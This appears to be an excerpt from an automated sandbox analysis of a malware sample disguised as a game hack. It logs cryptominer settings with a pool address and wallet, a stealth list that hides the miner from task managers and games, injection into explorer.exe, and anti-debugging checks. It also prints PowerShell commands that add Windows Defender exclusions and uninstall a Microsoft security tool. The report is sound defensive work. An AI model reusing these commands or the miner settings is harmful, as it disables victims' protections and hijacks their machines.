      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEITY\SYSTEMOM
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:9000--USER=45WBQXGMBXAX8NMDEUKLMEHGJXU16TC6MI1TCMZDHVCPJXSD7XZE2VGJJMBBQ4MH7U5HS95LWWZFB9ZOUYYOYXGA9O1ZH8G.RIGAS--PASS=RIGAS--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=QKRJWVGKUTVB.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--NICEHASH--TLS--CINIT-IDLE-WAIT=15--CINIT-IDLE-CPU=80--CINIT-ID=TOMKNVIVMVOOUNWV
      Source: explorer.exe, 00000045.00000002.4114240353.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,MODERNWARFARE.EXE,SHOOTERGAME.EXE,SHOOTERGAMESERVER.EXE,SHOOTERGAME_BE.EXE,GENSHINIMPACT.EXE,FACTORYGAME.EXE,BORDERLANDS2.EXE,ELITEDANGEROUS64.EXE,PLANETCOASTER.EXE,WARFRAME.X64.EXE,NMS.EXE,RAINBOWSIX.EXE,RAINBOWSIX_BE.EXE,CK2GAME.EXE,CK3.EXE,STELLARIS.EXE,ARMA3.EXE,ARMA3_X64.EXE,TSLGAME.EXE,FFXIV.EXE,FFXIV_DX11.EXE,GTA5.EXE,FORTNITECLIENT-WIN64-SHIPPING.EXE,R5APEX.EXE,VALORANT.EXE,CSGO.EXE,PORTALWARS-WIN64-SHIPPING.EXE,FIVEM.EXE,LEFT4DEAD2.EXE,FIFA21.EXE,BLACKOPSCOLDWAR.EXE,ESCAPEFROMTARKOV.EXE,TEKKEN 7.EXE,SRTTR.EXE,DEADBYDAYLIGHT-WIN64-SHIPPING.EXE,POINTBLANK.EXE,ENLISTED.EXE,WORLDOFTANKS.EXE,SOTGAME.EXE,FIVEM_B2189_GTAPROCESS.EXE,NARAKABLADEPOINT.EXE,RE8.EXE,SONIC COLORS - ULTIMATE.EXE,IW6SP64_SHIP.EXE,ROCKETLEAGUE.EXE,CYBERPUNK2077.EXE,FIVEM_GTAPROCESS.EXE,RUSTCLIENT.EXE,PHOTOSHOP.EXE,VIDEOEDITORPLUS.EXE,AFTERFX.EXE,LEAGUE OF LEGENDS.EXE,FALLOUT4.EXE,FARCRY5.EXE,RDR2.EXE,LITTLE_NIGHTMARES_II_ENHANCED-WIN64-SHIPPING.EXE,NBA2K22.EXE,BORDERLANDS3.EXE,LEAGUECLIENTUX.EXE,ROGUECOMPANY.EXE,TIGER-WIN64-SHIPPING.EXE,WATCHDOGSLEGION.EXE,PHASMOPHOBIA.EXE,VRCHAT.EXE,NBA2K21.EXE,NARAKABLADEPOINT.EXE,FORZAHORIZON4.EXE,ACAD.EXE,ANDROIDEMULATOREN.EXE,BF4.EXE,ZULA.EXE,ADOBE PREMIERE PRO.EXE,GENSHINIMPACT.EXE
      Source: C:\Users\user\AppData\Roaming\Sirus.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeMemory allocated: 4740000 memory reserve | memory write watchJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeFile opened / queried: VBoxGuest
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6117Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3697Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6119
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3712
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeDropped PE file which has not been started: C:\Windows\Temp\qkrjwvgkutvb.sysJump to dropped file
      Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep count: 6117 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep count: 3697 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exe TID: 7056Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7008Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 2332Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336Thread sleep count: 6119 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 3712 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -6456360425798339s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2228Thread sleep count: 60 > 30
      Source: C:\Windows\explorer.exe TID: 2228Thread sleep count: 46 > 30
      Source: C:\Users\user\AppData\Roaming\WeMod.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\FieroHack.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: leirdnhqqedj.exeBinary or memory string: 7BGRrBv2duFigTpjrFABMNHL4OW9tHbkekllagHj901K/K4gUIIF87I95fTg76xUkl4zn9NFgFF5WDGKG21pSuugN1YjQ8t5J4A6wjbZagk6TZA5qEMuDxomL6h8Vf0PrXWxUkxv0XoDppPCbk3T7n+VuUFp9SkLu0C49cMC67LHn2kceGtEOlRTFf+SEO3KGttST9u91a05s814f5kecfsaMTB1yYiaqF4GBWs5YtfyCWXlDoYQFQ1W0L+1jZsjQPHx
      Source: leirdnhqqedj.exeBinary or memory string: KvF/Jo0dm0BW98eGOb+/o7oaW6Dq6QmTlw2UTABOdru70TeFUXcI3wdAUSnxOus/CZ1MfA6v/bOdshgFsQlLEPjkOAZRwdHQj/O5gSt5TJK6fB7TrMCsMdodnBCMVOZaXvbhAgwZXp5wunbQCuepSGmVYrKFOoJJU3rtkWKtVXk/biAz6FsbsdzBVttqie6cw6a60d8dHosTBhgXASpv9BBlzKEi4XBjwNsinMx5a/TSD5vc4YiTOd8GzxzZgUXSmfzC
      Source: leirdnhqqedj.exeBinary or memory string: jRkCs7xJoXMtEB3ssw3IHChbBGDAaoEbNZ/wqJgHlX31jYb1SAShz6vUMmsGkLzHamXIzyaSKFGWfMJ5dWolQZRhULg1VaoJwpHEiYSRnJeI5ZAZMI3zsq1xVT8c+wkX25yHZLmCLG8PgBu0bTWkFuzFfREpCRG329BD1BvmBfGr1/fHTbC/7dOrm2in/fbpeE+/oTd8Pe3K0QlDV78VgqqvUPD6p9NVjZiPN18sHttS3HGfSB1cEI7IhpwH4QHV8Ga5
      Source: leirdnhqqedj.exeBinary or memory string: o227l4R7iYoAv6piAj1HoR+rx8YSKmjETutr0GRDjzil2XxPiy974qDzoGt6gCjemVth/yCXVW8+NfFbdL0TupLCCGlgWamzbCjrK5SyPLAzZfOTZOZmYSHtCWYbg9VmcI1MugHbfnxBf3DO6bZcpM5vLlzUsNJTZAZLal87CwD4P5hFY0eWLWCO1OCFtNh7CD627zq1W3sUXHVH+GyVNq72DcEarLp1WH3CxSerTE9hmd3ky8Vslnejnli4lcbK+cdp
      Source: leirdnhqqedj.exe, 0000002B.00000002.2202453826.00000238BC5DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\VBoxGuestData@?h
      Source: leirdnhqqedj.exeBinary or memory string: nsDe0Ggyt0Ha5V3kp09VNZsVg6iS31osvMo+1/wqxFXopchgfsd5JHjWujzpVZAL6GKs/k2IRg5njdUDsvDFdjUoUNrZgY/CHcg2ep1sqllfoFgIHmrtWLYUTG9s4Jf0Uqgm2i4qUVjeJ14mHZcetPqykhhxEC8vA76zFLhVTQ7zHAfRP4CQUPzZsa73PgxItZ+7r9JV1SrpLbKRY1PNSDsRFcwUzc+GbEFJV1VsO4bpM7Q29mAFoYVcO2hQEwl2WAVZ
      Source: leirdnhqqedj.exeBinary or memory string: amtIJL3IqYciY894Q7d0NGtbOQm4ANV/JUdgG38UePLRmruP7mBUznRNdKNKyW4CA6/CfgFOeMhmtl1FqBAkhU9esESCeDZdmlCX/bsndCdEW1kga0xfaR9syGzPXWDaVrN2OLNN62Xs8kwyFnm9aY8InWpauWC5XoAPJ383VmCIu40mMnkPZhpi9lidugzIYv1qx1tGrn5kWU2Ga474AGuVJtZeeUSI/NuXJCprimEWNvuLWYZjtmeDYPeA4iowE9KL
      Source: leirdnhqqedj.exeBinary or memory string: WQZPjlW/g20YOrpLFJnMCPkoIOYXMaFV/K2txsAtZYcLYAsiMYTwnXYZBJeyZNlxjepbdniPpbHCk8Ak4p3vUtVfg57MsncJX6nl5TDhqx+d7NtTjQzXxgSVwIvSspnJqNPcgS6mU1nQ6/KffCDfPNPNvMciZJedzJOfEoKWlvvY8liELqDl4XSkbhdx7s79YNJ2ooiEE1zQ7tmZZyi9i2zi3o/spUHV+Yzv7X2gq2H8tFZS0bW21mIU3m6ou3TfZKCQ
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,^q
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
      Source: leirdnhqqedj.exeBinary or memory string: fRUAsheH0RuZxlqUnW2PnTPVGTXxqxuXvNc7r5POGoWuV3+KMo5sik8zYIJu6RR2F3+fw16ZmK7E1v2c2koTthRiQNR9+9S51QNaRZodLMcUsAQJRaVMCiNI75i8JHNqxwzPN5gCXeJenp1THKhnQ54Q3xgg1GhhWl4aGd+c4JMrXxodUW4iVO7eWh+anl/TKaVSnljeXtbZSum/GEgg4DocAEJTXnMZ0BKQL9sfDZqaT6uJkyinUozMVpcR1frHVH9E
      Source: Sirus.exe, 00000007.00000002.1976423267.00000000028F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\^q
      Source: svchost.exe, 00000023.00000002.2203744663.0000020AF7A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.2205200272.0000020AFD259000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: leirdnhqqedj.exeBinary or memory string: VoUZ51ruD6mnE1JoLkZq94SS7O8pWGS09/E2LlU3YSh0B2Ylg4mnOQsGmCJu9xM83l0Jp+1kIVLcLmLSwv4DQH5i+pVeDY+MxfZem27O1luJfGYWBhtZztbwXIJLdu6OVND7XrdLgyGajD+JIeU8t2phcqAkrxiGQ6qQeMUGF2b+KiwFd+fRdbSPtWiafFQBlo1+3Qy7+UPJxJHmkOSnqMnmXS+rkQEXx+I/YPBxAhXlZP4GHPM1LLeMMtD0W7Srp5d3
      Source: leirdnhqqedj.exeBinary or memory string: NR1r5icKIYZmodJh4UZzu/U59y9Eu4oKFRI/piZRm/4xahkevcDZ907/Vuge4QjMhaN3JdNL/A42B9/qEicnbxmbq89HFyZv8mmLQSVtaZopfghGbJqbqCFX6q/chB7nLeHYKRTkaHdns4axiFl49nVmCifWhmTuuXNRZbXLhGXzm9Tl+5Do2ney7oLmxPdpPfYXkySjVkVZPIBTCw6bRK1IF5ErAKhQP6rb2n7nbJbEbpsYFtwJ624LGqc1wspqBDD2
      Source: leirdnhqqedj.exeBinary or memory string: S07hGfs58Hs1wqlTM0A9pwfiauFKGXiJuTE0/9rZQVhEIeE+4mbzAj9CJfw1QKZX99RqTQcBIYnxT01VoUS02u0r/GD/1KdMMwkkpZj/O01BGRRGYSp99MKEVEBkP6o39H7r2TVRK+b1Cb7V6ss7UQwhLUZi4t1OeYRdaycsqudw60rZUDnpLPUE/NO/ADscVDi3RvzEcUJ5aTk3apmqY+dMQ9k5+yL/9fbIMloAZT23UipG2nhND3kjKrH+mVJRSwah
      Source: leirdnhqqedj.exe, 0000002B.00000002.2202866805.00000238BC7C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: \\.\VBoxGuest
      Source: C:\Users\user\Desktop\FieroHack.exeAPI call chain: ExitProcess graph end nodegraph_0-3273
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
      Source: C:\Users\user\AppData\Roaming\Sirus.exeCode function: 7_2_025B1298 CheckRemoteDebuggerPresent,7_2_025B1298
      Hides threads from debuggers
      Source: C:\Users\user\AppData\Roaming\WeMod.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeThread information set: HideFromDebugger
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\AppData\Roaming\WeMod.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess queried: DebugFlagsJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess queried: DebugPortJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess queried: DebugPort
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess queried: DebugObjectHandle
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess queried: DebugFlags
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\Sirus.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,67_2_0000000140001160
      Source: C:\Users\user\AppData\Roaming\Sirus.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 141.94.96.144 9000
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Users\user\AppData\Roaming\WeMod.exeNtQueryInformationProcess: Indirect: 0x7FF617904D73Jump to behavior
      Source: C:\Users\user\AppData\Roaming\WeMod.exeNtQueryInformationProcess: Indirect: 0x7FF617904EA6Jump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeNtSetInformationThread: Indirect: 0x7FF6EE345113
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeNtQuerySystemInformation: Indirect: 0x7FF6EE345002
      Source: C:\Users\user\AppData\Roaming\WeMod.exeNtQuerySystemInformation: Indirect: 0x7FF617905002Jump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeNtQueryInformationProcess: Indirect: 0x7FF6EE344E0B
      Source: C:\Users\user\AppData\Roaming\WeMod.exeNtSetInformationThread: Indirect: 0x7FF617905113Jump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeNtQueryInformationProcess: Indirect: 0x7FF6EE344EA6
      Source: C:\Users\user\AppData\Roaming\WeMod.exeNtQueryInformationProcess: Indirect: 0x7FF617904E0BJump to behavior
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeNtQueryInformationProcess: Indirect: 0x7FF6EE344D73
      Injects code into the Windows Explorer (explorer.exe)
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMemory written: PID: 2736 base: 140000000 value: 4D
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMemory written: PID: 2736 base: 140001000 value: NU
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMemory written: PID: 2736 base: 140674000 value: DF
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMemory written: PID: 2736 base: 140847000 value: 00
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeMemory written: PID: 2736 base: 819010 value: 00
      Modifies the context of a thread in another process (thread injection)
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeThread register set: target process: 3180
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeThread register set: target process: 2736
      Sets debug register (to hijack the execution of another thread)
      Source: C:\Users\user\AppData\Roaming\WeMod.exeThread register set: 4340 501Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exeProcess created: C:\Windows\explorer.exe explorer.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
      Source: Sirus.exe, 00000007.00000002.1976423267.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
